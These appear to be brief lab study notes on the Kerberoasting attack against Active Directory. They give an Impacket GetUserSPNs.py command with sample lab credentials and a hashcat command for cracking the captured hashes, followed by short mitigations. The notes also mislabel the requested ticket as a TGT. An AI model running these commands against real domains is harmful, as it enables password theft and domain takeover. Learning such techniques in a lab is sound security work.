Quick way to get domain admin in network

Kerberos is an authentication method. 1. When a user logs on to Active Directory, the user authenticates to the Domain Controller (DC) using the user’s password which of course the DC knows.

• Attack take advantage of service accounts.(sql service)
• we can request Ticket granting ticket (TGT)

Kerberoasting attack

GetUserSPNs.py marvel.local/fcastle:Password1 -dc-ip 10.10.10.250 -request

cracking the hash

hashcat -m 13100 kerberos.txt rockyou.txt

Mitigation

Strong passwords

Least privilege

Dont run service account as domain admin